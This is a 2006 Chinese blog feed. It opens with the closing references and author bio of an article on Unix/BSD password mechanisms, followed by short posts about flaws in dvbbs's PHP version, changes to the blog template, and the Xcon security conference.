本文只简要的说明了一下Unix/Linux特别是BSD的口令机制，要也因本人水平，不能在此文深入的论述此问题。关于密码的安全性，以及密码破解和任何使用更安全的加密机制等问题，本人会在以后撰文论述。

参考资料：
man 5 passwd
man 3 crypt
man md5
man des
man login.conf
DES-to-MD5-(mini)HOWTO
《Hacking Linux Exposed》
《Unix System Administrator Handbook》

作者简介：
Freebird,姓名：匡萃彪。CNFUG核心成员。Unix/Linux/BSD的狂热追随者，熟悉BSD,Linux，Solaris，C，Shell。主要研究方向：各种服务器架设、系统和网络安全、内核源码分析以及英文文档翻译。欢迎您通过freebird@cnfug.org与本人联系。

wofeiwo 2006-08-26 16:31 发表评论

dvbbs php version

wofeiwo — Sat, 26 Aug 2006 02:32:00 GMT

dvbbs又要做php版本了,抢discuz!的生意,昨天看了下代码.漏洞百出,真不愧"洞"网的美名.

wofeiwo 2006-08-26 10:32 发表评论

又换模板

wofeiwo — Thu, 24 Aug 2006 09:43:00 GMT

各位,行行好告诉我这个模板和原来那模板哪个好吧

wofeiwo 2006-08-24 17:43 发表评论

换模板

wofeiwo — Mon, 21 Aug 2006 10:47:00 GMT

原来模板太黑,不适合阅读,不能因为我喜欢黑色而导致各位读者的眼睛生痛.
内容部分也太窄,代码被截断换行,不利.

明天Xcon要开始了,n多人都去bj聚会了.boy和村长还在Xcon上有个Zend decoder的议题.赞一个先.
考虑考虑,争取明年我也去凑凑热闹.见见各位牛人大虾,顺便见识下村长的b105

wofeiwo 2006-08-21 18:47 发表评论